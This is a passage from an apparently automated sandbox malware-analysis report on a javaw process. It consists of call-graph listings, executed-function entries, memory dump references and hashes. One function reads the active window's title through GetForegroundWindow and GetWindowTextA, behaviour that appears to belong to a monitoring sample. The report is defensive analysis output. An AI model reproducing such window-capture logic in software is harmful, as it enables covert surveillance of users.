73a95c4f 13741->13743 13745 73a95c62 13742->13745 13751 73a95c6f 13742->13751 13744 73a9128d _malloc 66 API calls 13743->13744 13747 73a95c57 13744->13747 13746 73a91253 _free 66 API calls 13745->13746 13748 73a95c6a _free 13746->13748 13747->13739 13748->13739 13749 73a95ca7 13752 73a91d01 _malloc DecodePointer 13749->13752 13750 73a95c77 HeapReAlloc 13750->13748 13750->13751 13751->13749 13751->13750 13754 73a95cd7 13751->13754 13756 73a91d01 _malloc DecodePointer 13751->13756 13759 73a95cbf 13751->13759 13753 73a95cad 13752->13753 13755 73a917a3 __fclose_nolock 66 API calls 13753->13755 13757 73a917a3 __fclose_nolock 66 API calls 13754->13757 13755->13748 13756->13751 13758 73a95cdc GetLastError 13757->13758 13758->13748 13760 73a917a3 __fclose_nolock 66 API calls 13759->13760 13761 73a95cc4 GetLastError 13760->13761 13761->13748 13765 73a93f40 LeaveCriticalSection 13762->13765 13764 73a91871 13764->13711 13765->13764 13767 73a95bce 13766->13767 13773 73a95be9 13766->13773 13768 73a95bda 13767->13768 13767->13773 13769 73a917a3 __fclose_nolock 65 API calls 13768->13769 13771 73a95bdf 13769->13771 13770 73a95bfc HeapAlloc 13772 73a95c23 13770->13772 13770->13773 13771->13184 13772->13184 13773->13770 13773->13772 13774 73a91d01 _malloc DecodePointer 13773->13774 13774->13773 13775->13188 13782 73a93f40 LeaveCriticalSection 13776->13782 13778 73a93106 13778->13193 13783 73a93f40 LeaveCriticalSection 13779->13783 13781 73a93154 13781->13198 13782->13778 13783->13781 13786 73a931f5 ___DllMainCRTStartup 13784->13786 13785 73a9320d 13788 73a9321b 13785->13788 13790 73a91253 _free 66 API calls 13785->13790 13786->13785 13787 73a91253 _free 66 API calls 13786->13787 13789 73a932f7 ___DllMainCRTStartup 13786->13789 13787->13785 13791 73a93229 13788->13791 13792 73a91253 _free 66 API calls 13788->13792 13789->13206 13790->13788 13793 73a91253 _free 66 API calls 13791->13793 13797 73a93237 13791->13797 13792->13791 13793->13797 13794 73a91253 _free 66 API calls 13795 73a93245 13794->13795 13796 73a93253 13795->13796 13798 73a91253 _free 66 API calls 13795->13798 13799 73a93261 13796->13799 13800 73a91253 _free 66 API calls 13796->13800 13797->13794 13797->13795 13798->13796 13801 73a93272 13799->13801 13803 73a91253 _free 66 API calls 13799->13803 13800->13799 13802 73a94019 __lock 66 API calls 13801->13802 13804 73a9327a 13802->13804 13803->13801 13805 73a9329f 13804->13805 13806 73a93286 InterlockedDecrement 13804->13806 13820 73a93303 13805->13820 13806->13805 13807 73a93291 13806->13807 13807->13805 13810 73a91253 _free 66 API calls 13807->13810 13810->13805 13811 73a94019 __lock 66 API calls 13812 73a932b3 13811->13812 13813 73a932e4 13812->13813 13815 73a95384 ___removelocaleref 8 API calls 13812->13815 13823 73a9330f 13813->13823 13818 73a932c8 13815->13818 13817 73a91253 _free 66 API calls 13817->13789 13818->13813 13819 73a9541d ___freetlocinfo 66 API calls 13818->13819 13819->13813 13826 73a93f40 LeaveCriticalSection 13820->13826 13822 73a932ac 13822->13811 13827 73a93f40 LeaveCriticalSection 13823->13827 13825 73a932f1 13825->13817 13826->13822 13827->13825 13828 28dd8f7 13829 28dd941 13828->13829 13830 28ddaf6 13829->13830 13832 73a911c0 GetForegroundWindow 13829->13832 13833 73a911e8 GetWindowTextLengthA 13832->13833 13834 73a911d0 13832->13834 13835 73a9128d _malloc 66 API calls 13833->13835 13834->13830 13836 73a911fd GetWindowTextA 13835->13836 13837 73a91211 13836->13837 13837->13837 13838 73a91253 _free 66 API calls 13837->13838 13839 73a91238 13838->13839 13839->13830

                                                                                                                                                                                                                                    Executed Functions

                                                                                                                                                                                                                                    Function 73A911C0 Relevance: 7.6, APIs: 5, Instructions: 54COMMON
                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • GetForegroundWindow.USER32 ref: 73A911C4
                                                                                                                                                                                                                                    • GetWindowTextLengthA.USER32(00000000), ref: 73A911EB
                                                                                                                                                                                                                                    • _malloc.LIBCMT ref: 73A911F8
                                                                                                                                                                                                                                    • GetWindowTextA.USER32(00000000,00000000,-00000002), ref: 73A91208
                                                                                                                                                                                                                                    • _free.LIBCMT ref: 73A91233
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000006.00000002.2857387985.0000000073A91000.00000020.00000001.01000000.0000000A.sdmp, Offset: 73A90000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2857357104.0000000073A90000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2857437082.0000000073A98000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2857465680.0000000073A9B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2857493977.0000000073A9E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_73a90000_javaw.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Window$Text$ForegroundLength_free_malloc
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 2076420077-0
                                                                                                                                                                                                                                    • Opcode ID: 250df6807f5aa68ca11d9b9b82472a74057f27a548b58697db85e82021af406b
                                                                                                                                                                                                                                    • Instruction ID: 8911bbd4a205cb1926ad8cb1e21092d766858f0de3d6ca0f2e53cfc2fe4d55d8
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 250df6807f5aa68ca11d9b9b82472a74057f27a548b58697db85e82021af406b
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D101D8B76002056FE301ABA5DCC6E6B77ADEB992547244176F849FB300DA31AD0687B0
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 02979712 Relevance: .3, Instructions: 315COMMON
                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 11 2979712-297971b call 2979cc2 13 2979720-297972c 11->13 14 2979732-2979739 13->14 15 29799f9-2979a00 13->15 18 297973f-2979745 14->18 19 297975d-297976a 14->19 16 2979a06-2979a0c 15->16 17 2979a12-2979a21 15->17 16->17 20 2979a4e-2979a6b 16->20 21 2979a27-2979a2b 17->21 22 2979a3b-2979a4d 17->22 23 2979bc2 18->23 24 297974b-2979753 18->24 25 2979770-297977c 19->25 26 2979bca-2979bcf 19->26 28 2979c27-2979c2e 20->28 29 2979a71-2979ab3 20->29 21->22 27 2979a31-2979a35 21->27 23->26 24->19 30 2979759-297975a 24->30 31 2979bd4 25->31 32 2979782-2979789 25->32 26->31 27->22 34 2979c16-2979c22 27->34 52 2979c33-2979c3f 28->52 45 2979acd-2979ade 29->45 46 2979ab9-2979abd 29->46 30->19 39 2979bd9-2979be0 31->39 33 29797ae-29797b0 32->33 36 29797b2-29797b7 33->36 37 2979790-2979798 33->37 34->22 43 29797c1-29797c7 36->43 41 297979e-29797a1 37->41 42 29797bc 37->42 41->42 47 29797a7-29797a8 41->47 42->43 48 29798f1-2979904 43->48 49 29797cd-29797dc 43->49 46->45 50 2979ac3-2979ac7 46->50 47->33 53 2979961-297999d call 2979ce6 48->53 54 297990a-2979923 48->54 55 29797e2-29797ff 49->55 56 29798b1-29798e8 call 2979cce 49->56 50->45 50->52 52->45 70 2979c05-2979c0c 53->70 71 29799a3-29799d8 call 2986260 53->71 59 2979bf4-2979bfb 54->59 60 2979929-297995c call 2986260 54->60 55->39 62 2979805-2979833 55->62 56->48 73 29799dc-29799ee 60->73 66 2979be5-2979bea 62->66 67 2979839-2979858 62->67 66->59 67->66 72 297985e-297987d 67->72 71->73 75 2979883-2979887 72->75 76 297988d-2979896 72->76 81 29799f4-2979adf 73->81 82 2979ae3-2979af2 73->82 75->76 80 2979898-29798ad 75->80 76->76 76->80 80->56 81->82 84 2979b0c-2979b1b 82->84 85 2979af8-2979afc 82->85 85->84 86 2979b02-2979b06 85->86 86->84 87 2979c44-2979c50 86->87 87->84
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000006.00000002.2844380259.0000000002974000.00000040.00000800.00020000.00000000.sdmp, Offset: 02974000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_2974000_javaw.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 944949145b264f30a99e85031fdd02ffdd17d8a8cb892109ff3d55352820b60a
                                                                                                                                                                                                                                    • Instruction ID: 6c2c5a7e9c5260a3999de8bd764624cbcec2741b6aa1502ec02a9bed6017ea18
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 944949145b264f30a99e85031fdd02ffdd17d8a8cb892109ff3d55352820b60a
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DDD12A71A09340CFD718CF29C08462ABBF2FF89314F6589AEE4999B355C735E842CB81
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 028DD8F7 Relevance: .2, Instructions: 223COMMON
                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 89 28dd8f7-28dd93b 90 28dd941-28dd9aa call 28dd94b 89->90 91 28dd9b0-28dd9c7 89->91 90->91 93 28dd9cd-28dd9ed 90->93 91->93 94 28dde5f-28dde64 call 28dde6e 91->94 97 28dda0b-28dda25 93->97 98 28dd9f3-28dda08 93->98 101 28dde69-28ddec8 94->101 99 28dda2b call 28dda35 97->99 100 28dda95-28ddaa6 97->100 98->97 106 28dda30-28dda92 99->106 109 28ddaac-28ddabe 100->109 110 28ddac2-28ddacb 100->110 106->100 109->110 111 28ddb3b-28ddb6f call 73a911c0 110->111 112 28ddad1-28ddb38 call 28ddadb 110->112 114 28ddb71-28ddb73 111->114 112->111 116 28ddb75 114->116 117 28ddaf6-28ddb34 114->117 119 28ddb77-28ddb82 116->119 120 28ddb83-28ddb8d 116->120 122 28ddb90-28ddbc7 119->122 123 28ddb84-28ddbc7 119->123 120->122 124 28ddbcd-28ddbd4 122->124 125 28ddbda-28ddbeb 122->125 123->124 123->125 124->125 126 28ddbee-28ddc2a 124->126 125->126 128 28ddc5b-28ddc65 126->128 129 28ddc30-28ddc3b 126->129 130 28ddc6b-28ddc71 128->130 131 28ddc72-28ddc82 128->131 132 28ddc56-28ddc5a 129->132 133 28ddc41-28ddc46 129->133 130->131 134 28ddcfc-28ddd05 131->134 135 28ddc88-28ddcf0 call 28ddc92 call 28ddcf5 131->135 132->128 136 28ddc4c-28ddc4f 133->136 137 28ddc54 133->137 139 28dde28-28dde2f 134->139 140 28ddd0b-28ddd13 134->140 135->134 136->132 137->132 142 28dde4d-28dde5b 139->142 143 28dde35-28dde4a 139->143 144 28ddd8d-28ddda4 140->144 145 28ddd19-28ddd81 call 28ddd23 call 28ddd86 140->145 142->94 143->142 149 28dddaa-28dddae 144->149 150 28dde25 144->150 145->144 149->150 155 28dddb4-28dddb8 149->155 150->139 155->150 158 28dddbe-28dddc6 call 28dddcb 155->158 158->150
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000006.00000002.2844380259.00000000028D2000.00000040.00000800.00020000.00000000.sdmp, Offset: 028D2000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_28d2000_javaw.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 40b64f28f167f68212fac72df23b5bd7f6d34c85fb3b9ae36ed3452e5e954c21
                                                                                                                                                                                                                                    • Instruction ID: 2241c4cd07e8d49c8cc2448bb087a31be0df9999d580a4da81420da8eaf5b629
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 40b64f28f167f68212fac72df23b5bd7f6d34c85fb3b9ae36ed3452e5e954c21
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4AA18B7EA04601DFEB18CF64C494BA9FBB1FF49318F088599D9198B381C775B849CB91
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 028DD8E0 Relevance: .2, Instructions: 160COMMON
                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 164 28dd8e0-28dd93b 166 28dd941-28dd9aa call 28dd94b 164->166 167 28dd9b0-28dd9c7 164->167 166->167 169 28dd9cd-28dd9ed 166->169 167->169 170 28dde5f-28ddec8 call 28dde6e 167->170 173 28dda0b-28dda25 169->173 174 28dd9f3-28dda08 169->174 175 28dda2b-28dda92 call 28dda35 173->175 176 28dda95-28ddaa6 173->176 174->173 175->176 185 28ddaac-28ddabe 176->185 186 28ddac2-28ddacb 176->186 185->186 187 28ddb3b-28ddb6f call 73a911c0 186->187 188 28ddad1-28ddb38 call 28ddadb 186->188 190 28ddb71-28ddb73 187->190 188->187 192 28ddb75 190->192 193 28ddaf6-28ddb34 190->193 195 28ddb77-28ddb82 192->195 196 28ddb83-28ddb8d 192->196 198 28ddb90-28ddbc7 195->198 199 28ddb84-28ddbc7 195->199 196->198 200 28ddbcd-28ddbd4 198->200 201 28ddbda-28ddbeb 198->201 199->200 199->201 200->201 202 28ddbee-28ddc2a 200->202 201->202 204 28ddc5b-28ddc65 202->204 205 28ddc30-28ddc3b 202->205 206 28ddc6b-28ddc71 204->206 207 28ddc72-28ddc82 204->207 208 28ddc56-28ddc5a 205->208 209 28ddc41-28ddc46 205->209 206->207 210 28ddcfc-28ddd05 207->210 211 28ddc88-28ddcf0 call 28ddc92 call 28ddcf5 207->211 208->204 212 28ddc4c-28ddc4f 209->212 213 28ddc54 209->213 215 28dde28-28dde2f 210->215 216 28ddd0b-28ddd13 210->216 211->210 212->208 213->208 218 28dde4d-28dde5b 215->218 219 28dde35-28dde4a 215->219 220 28ddd8d-28ddda4 216->220 221 28ddd19-28ddd81 call 28ddd23 call 28ddd86 216->221 218->170 219->218 225 28dddaa-28dddae 220->225 226 28dde25 220->226 221->220 225->226 231 28dddb4-28dddb8 225->231 226->215 231->226 234 28dddbe-28dddc6 call 28dddcb 231->234 234->226
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000006.00000002.2844380259.00000000028D2000.00000040.00000800.00020000.00000000.sdmp, Offset: 028D2000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_28d2000_javaw.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 5ec467a0234221d1ebdea17edc97c9b97bcd18c75aefbd2e92e779568deb68de
                                                                                                                                                                                                                                    • Instruction ID: f8818de6427b026d3459f8ce4c83d728cca139f96f48dbbcd226ac4b6fa32afa
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5ec467a0234221d1ebdea17edc97c9b97bcd18c75aefbd2e92e779568deb68de
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6B619C7E604601EFEB18CF24C494BAAF7B1FB49718F18859DD8198B381C774B859CB91
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 028D0672 Relevance: .1, Instructions: 57COMMON
                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 279 28d0672-28d069f 280 28d06ac-28d06b7 279->280 281 28d06a5 279->281 282 28d06cd-28d06d3 280->282 283 28d06bd-28d06c0 280->283 281->280 293 28d06d5 call 28dec1c 282->293 294 28d06d5 call 28e4ccd 282->294 295 28d06d5 call 28e49aa 282->295 296 28d06d5 call 2979712 282->296 297 28d06d5 call 28e4b78 282->297 298 28d06d5 call 28e45e9 282->298 299 28d06d5 call 28e3c76 282->299 300 28d06d5 call 28e6495 282->300 284 28d06c2-28d06cb 283->284 284->282 284->284 285 28d06d7-28d06e0 286 28d070f-28d0714 285->286 287 28d06e6-28d06e9 285->287 288 28d06fa-28d070e 286->288 289 28d06ef-28d06f2 287->289 290 28d0716-28d071a 287->290 291 28d071c-28d0720 289->291 292 28d06f8 289->292 290->288 291->288 292->288 293->285 294->285 295->285 296->285 297->285 298->285 299->285 300->285
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000006.00000002.2844380259.00000000028D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028D0000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_28d0000_javaw.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: d61c110d2cda61784ef97d3302bc2e76e4668c41f83201132fff20d6976a7cc2
                                                                                                                                                                                                                                    • Instruction ID: 6f7d3693d1664c0c0633b3360a2958ca67c6aed545bc7165ca07c3b51a1d65ae
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d61c110d2cda61784ef97d3302bc2e76e4668c41f83201132fff20d6976a7cc2
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 92114CBED0022A9FCF28DF49C8854ADB7B0FB98314F158525EC69E7342D7346924CB91
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 028D0651 Relevance: .0, Instructions: 38COMMON
                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 301 28d0651-28d0653 302 28d06be-28d06cb 301->302 303 28d0655-28d0669 301->303 304 28d06cd-28d06d3 302->304 305 28d06c2-28d06cb 302->305 303->302 314 28d06d5 call 28dec1c 304->314 315 28d06d5 call 28e4ccd 304->315 316 28d06d5 call 28e49aa 304->316 317 28d06d5 call 2979712 304->317 318 28d06d5 call 28e4b78 304->318 319 28d06d5 call 28e45e9 304->319 320 28d06d5 call 28e3c76 304->320 321 28d06d5 call 28e6495 304->321 305->304 305->305 306 28d06d7-28d06e0 307 28d070f-28d0714 306->307 308 28d06e6-28d06e9 306->308 309 28d06fa-28d070e 307->309 310 28d06ef-28d06f2 308->310 311 28d0716-28d071a 308->311 312 28d071c-28d0720 310->312 313 28d06f8 310->313 311->309 312->309 313->309 314->306 315->306 316->306 317->306 318->306 319->306 320->306 321->306
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000006.00000002.2844380259.00000000028D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028D0000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_28d0000_javaw.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 0f8180281ef2d642fd9f3c9a0aceb09b40316283b62d1ebac1d180c7e083800d
                                                                                                                                                                                                                                    • Instruction ID: 970b7c95d58a4086995394f3464ab6d4165edea12e62efba2b0bd9da3979ff69
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0f8180281ef2d642fd9f3c9a0aceb09b40316283b62d1ebac1d180c7e083800d
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2301463EE002298BCB14CF48C5842ADB770FB48218F294095DC68AB342D732AD26CB96
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 028E4CCD Relevance: .0, Instructions: 22COMMON
                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 331 28e4ccd-28e4ce9 332 28e4cf4-28e4d38 331->332
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000006.00000002.2844380259.00000000028D2000.00000040.00000800.00020000.00000000.sdmp, Offset: 028D2000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_28d2000_javaw.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: c0ab4de1a9bcc564ccaabad691ac9778ba89feaa6973b06d27c47ea4dce589a7
                                                                                                                                                                                                                                    • Instruction ID: e4a3dbf3cd4e3dc06eda274b30b7cad7745c7fd308f8836a3afe05975e5055ec
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c0ab4de1a9bcc564ccaabad691ac9778ba89feaa6973b06d27c47ea4dce589a7
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 86F06CBA904A06EBEB19CF65C404BEAF7B4BB88714F14461AD42C57250C778B469CBD0
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 028D0722 Relevance: .0, Instructions: 22COMMON
                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 322 28d0722-28d0736 324 28d070f-28d0714 322->324 325 28d06e6-28d06e9 322->325 326 28d06fa-28d070e 324->326 327 28d06ef-28d06f2 325->327 328 28d0716-28d071a 325->328 329 28d071c-28d0720 327->329 330 28d06f8 327->330 328->326 329->326 330->326
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000006.00000002.2844380259.00000000028D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028D0000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_28d0000_javaw.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: b9c55746d63bca98fd3f66c13fdb8eb4e993777a1b5bc321808caaf26eee05a0
                                                                                                                                                                                                                                    • Instruction ID: c1d995e454bcfadfba9a4479398b786d52c43999b51a413f9ad54841153834a9
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b9c55746d63bca98fd3f66c13fdb8eb4e993777a1b5bc321808caaf26eee05a0
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 34F0A57EC00229DB8B14DF48C4411ADB7B1FB45318F2A8596DC6DBB241D332AD66CF91
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 028E4B78 Relevance: .0, Instructions: 21COMMON
                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 333 28e4b78-28e4b93 334 28e4b9e-28e4be2 333->334
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000006.00000002.2844380259.00000000028D2000.00000040.00000800.00020000.00000000.sdmp, Offset: 028D2000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_28d2000_javaw.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 890212fbf10f64c9f59d887a06b63d43bdbe7269e8c44a771010bf20ae8b7621
                                                                                                                                                                                                                                    • Instruction ID: daaf52cee0af20483f707503ddc140405eb54211ae715200d8a8133666d0127e
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 890212fbf10f64c9f59d887a06b63d43bdbe7269e8c44a771010bf20ae8b7621
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 74F07FBA904A06EBDB158F61C0047DAFBB4BB88714F14421AD42C57350D778B4658BC0
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 028E6495 Relevance: .0, Instructions: 20COMMON
                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 337 28e6495-28e64af 338 28e64ba-28e64fe 337->338
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000006.00000002.2844380259.00000000028D2000.00000040.00000800.00020000.00000000.sdmp, Offset: 028D2000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_28d2000_javaw.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: c4d6ede4df22ed28e6a61ad64b43f83331f48f438addc4d0d6ec43f91a244377
                                                                                                                                                                                                                                    • Instruction ID: 9ce4e75b9550efaff36bf7f84a272f9d3bfd691912597f95217d6bbf07f7d2e7
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c4d6ede4df22ed28e6a61ad64b43f83331f48f438addc4d0d6ec43f91a244377
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DBF09BBAA04B06EBDB25CF65C0047CAFBB4BB88714F54421AC82C67360D778B469CBC0
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 028DEC1C Relevance: .0, Instructions: 20COMMON
                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 335 28dec1c-28dec36 336 28dec41-28dec85 335->336
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000006.00000002.2844380259.00000000028D2000.00000040.00000800.00020000.00000000.sdmp, Offset: 028D2000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_28d2000_javaw.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: a21c6d7d211a1efd03bb7126a280c4951d53ecaf89c74f64fc8399c83fbe4755
                                                                                                                                                                                                                                    • Instruction ID: 8e6630fdf957a89ded19539669d9e66dd48ffaea2fd14dfbe6e8c05da7c244ca
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a21c6d7d211a1efd03bb7126a280c4951d53ecaf89c74f64fc8399c83fbe4755
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E6F07FBA904A06EBDB158F61C0047DAFBB4BB88714F14421AC42C67360D778B4698BC0
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 028E6575 Relevance: .0, Instructions: 20COMMON
                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 339 28e6575-28e658f 340 28e659a-28e65de 339->340
                                                                                                                                                                                                                                    Memory Dump Source
